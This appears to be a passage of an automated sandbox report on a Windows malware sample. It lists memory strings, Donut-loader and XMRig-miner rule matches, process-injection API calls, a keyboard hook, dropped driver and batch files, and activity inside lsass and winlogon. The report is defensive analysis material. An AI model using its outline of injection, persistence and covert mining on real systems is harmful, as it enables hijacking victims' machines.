Source: svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1366018989.0000010D91A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367429694.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory, 10_2_00401D58
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401D18 NtWriteVirtualMemory, 10_2_00401D18
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_004019D8 NtCreateThreadEx, 10_2_004019D8
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401D98 NtProtectVirtualMemory, 10_2_00401D98
Source: C:\Users\user\AppData\Local\Temp\paint.exe Code function: 10_2_00401C98 NtClose, 10_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401D58 NtAllocateVirtualMemory, 31_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401D18 NtWriteVirtualMemory, 31_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_004019D8 NtCreateThreadEx, 31_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401D98 NtProtectVirtualMemory, 31_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 31_2_00401C98 NtClose, 31_2_00401C98
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 94_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 95_2_0000000140001868
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 97_2_0000000140001868
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_3fc24ylm.ndk.ps1
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430540 1_2_00007FF7C1430540
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430B40 1_2_00007FF7C1430B40
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430508 1_2_00007FF7C1430508
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C143089D 1_2_00007FF7C143089D
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Code function: 1_2_00007FF7C1430500 1_2_00007FF7C1430500
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91B23F0 18_3_0000025EE91B23F0
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91BCC94 18_3_0000025EE91BCC94
Source: C:\Windows\System32\cmd.exe Code function: 18_3_0000025EE91BCE18 18_3_0000025EE91BCE18
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31C9CC94 19_3_000001AD31C9CC94
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31C923F0 19_3_000001AD31C923F0
Source: C:\Windows\System32\conhost.exe Code function: 19_3_000001AD31C9CE18 19_3_000001AD31C9CE18
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11E106 20_2_00000113DB11E106
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11E4D6 20_2_00000113DB11E4D6
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11E90E 20_2_00000113DB11E90E
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11D4D2 20_2_00000113DB11D4D2
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00000113DB11ED6A 20_2_00000113DB11ED6A
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D50F6 20_2_00007FF7C14D50F6
Source: C:\Windows\System32\conhost.exe Code function: 20_2_00007FF7C14D5EA2 20_2_00007FF7C14D5EA2
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55E4D6 30_2_0000021E7B55E4D6
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55E106 30_2_0000021E7B55E106
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55ED6A 30_2_0000021E7B55ED6A
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55D4D2 30_2_0000021E7B55D4D2
Source: C:\Windows\System32\conhost.exe Code function: 30_2_0000021E7B55E90E 30_2_0000021E7B55E90E
Source: C:\Windows\System32\conhost.exe Code function: 30_2_00007FF7C14E50F6 30_2_00007FF7C14E50F6
Source: C:\Windows\System32\conhost.exe Code function: 30_2_00007FF7C14E5EA2 30_2_00007FF7C14E5EA2
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DCCE18 36_3_00000236C6DCCE18
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DC23F0 36_3_00000236C6DC23F0
Source: C:\Windows\System32\conhost.exe Code function: 36_3_00000236C6DCCC94 36_3_00000236C6DCCC94
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E723F0 44_3_0000015829E723F0
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E7CE18 44_3_0000015829E7CE18
Source: C:\Windows\System32\cmd.exe Code function: 44_3_0000015829E7CC94 44_3_0000015829E7CC94
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A6CE18 45_3_000001D643A6CE18
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A6CC94 45_3_000001D643A6CC94
Source: C:\Windows\System32\conhost.exe Code function: 45_3_000001D643A623F0 45_3_000001D643A623F0
Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063182CE18 58_3_000002063182CE18
Source: C:\Windows\System32\conhost.exe Code function: 58_3_000002063182CC94 58_3_000002063182CC94
Source: C:\Windows\System32\conhost.exe Code function: 58_3_00000206318223F0 58_3_00000206318223F0
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE36423F0 69_3_000001CCE36423F0
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE364CE18 69_3_000001CCE364CE18
Source: C:\Windows\System32\conhost.exe Code function: 69_3_000001CCE364CC94 69_3_000001CCE364CC94
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA1CC94 70_3_000001858EA1CC94
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA123F0 70_3_000001858EA123F0
Source: C:\Windows\System32\conhost.exe Code function: 70_3_000001858EA1CE18 70_3_000001858EA1CE18
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBECE18 73_3_000002942EBECE18
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBE23F0 73_3_000002942EBE23F0
Source: C:\Windows\System32\conhost.exe Code function: 73_3_000002942EBECC94 73_3_000002942EBECC94
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A038CE18 83_3_000001C8A038CE18
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A03823F0 83_3_000001C8A03823F0
Source: C:\Windows\System32\conhost.exe Code function: 83_3_000001C8A038CC94 83_3_000001C8A038CC94
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF03CC94 87_3_000001E5EF03CC94
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF0323F0 87_3_000001E5EF0323F0
Source: C:\Windows\System32\conhost.exe Code function: 87_3_000001E5EF03CE18 87_3_000001E5EF03CE18
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140001CF0 94_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002D4C 94_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140001274 94_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002434 94_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140003204 94_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140001CF0 95_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140002D4C 95_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140001274 95_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140002434 95_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140003204 95_2_0000000140003204
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD62323F0 96_3_000002ADD62323F0
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD623CC94 96_3_000002ADD623CC94
Source: C:\Windows\System32\dllhost.exe Code function: 96_3_000002ADD623CE18 96_3_000002ADD623CE18
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140001CF0 97_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140002D4C 97_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140001274 97_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140002434 97_2_0000000140002434
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140003204 97_2_0000000140003204
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE5CE18 99_3_0000021C0EE5CE18
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE5CC94 99_3_0000021C0EE5CC94
Source: C:\Windows\System32\conhost.exe Code function: 99_3_0000021C0EE523F0 99_3_0000021C0EE523F0
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC603823F0 101_3_000001FC603823F0
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6038CC94 101_3_000001FC6038CC94
Source: C:\Windows\System32\winlogon.exe Code function: 101_3_000001FC6038CE18 101_3_000001FC6038CE18
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C734CC94 103_3_00000161C734CC94
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C73423F0 103_3_00000161C73423F0
Source: C:\Windows\System32\lsass.exe Code function: 103_3_00000161C734CE18 103_3_00000161C734CE18
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
Source: e7WMhx18XN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5434
Source: unknown Process created: Commandline size = 5297
Source: unknown Process created: Commandline size = 5277
Source: unknown Process created: Commandline size = 5288
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2684
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
